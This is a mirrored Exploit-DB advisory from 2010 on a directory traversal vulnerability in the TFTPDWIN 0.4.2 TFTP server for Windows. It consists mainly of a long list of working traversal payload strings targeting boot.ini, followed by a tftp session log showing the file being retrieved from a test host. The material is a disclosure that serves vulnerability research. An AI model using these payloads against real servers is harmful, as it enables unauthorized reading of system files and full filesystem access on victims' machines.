TFTPDWIN 0.4.2 – Directory Traversal

  • 作者: chr1x
    日期: 2010-09-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14856/
  • +------------------------------------------------------------------------+
| .......|
| ..''xxxxxxxxxxxxxxx'...|
|..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..|
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''........... |
|.xxxxxxxxxxxxxxxxxx'... .........'. |
| 'xxxxxxxxxxxxxxx'......'.|
|'xxxxxxxxxxxxxx'..'x...x. |
| .xxxxxxxxxxxx'...'..... .' |
| 'xxxxxxxxx'......x.|
| xxxxxxx'...x.|
| xxxx'.....xx.|
| 'x'....'xxxxxxx'. x .x.|
| .x'. .'xxxxxxxxxxxxxx. '' .' |
|.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'|
| .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.|
|.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'|
|.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. |
|.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. |
|.'xxxxxxx'.......xxxxxxx'.|
| ..'xxxxx'.. ..xxxxx'.. |
|....'xx'.....''''...|
||
|CubilFelino Security Research Labs|
|proudly presents... |
+------------------------------------------------------------------------+


Author: chr1x (chr1x@sectester.net)
Date: August 30, 2010
Affected operating system/software, including full version details
* TFTP Server TFTPDWIN v0.4.2, Tested on Windows XP PRO SP3

Download:
http://www.prosysinfo.webpark.pl/sciagnij.html
http://www.versiontracker.com/php/dlpage.php?id=10417389&db=win&pid=10417389&kind=&lnk=http://www.prosysinfo.com.pl/tftpserver/tftpdwin.exe

How the vulnerability can be reproduced

* Please, use the strings shown below to reproduce the issue.

[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini<- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: \../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../\../boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\boot.ini<- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\/..\boot.ini<- Vulnerable string!!

Confirmation Log:

root@olovely:/# tftp 192.168.1.53
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) ..\..\..\..\..\..\..\boot.ini
Received 211 bytes in 0.0 seconds
tftp>


What impact the vulnerability has on the vulnerable system
Any additional details that might help in the verification process

* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
    PowerShell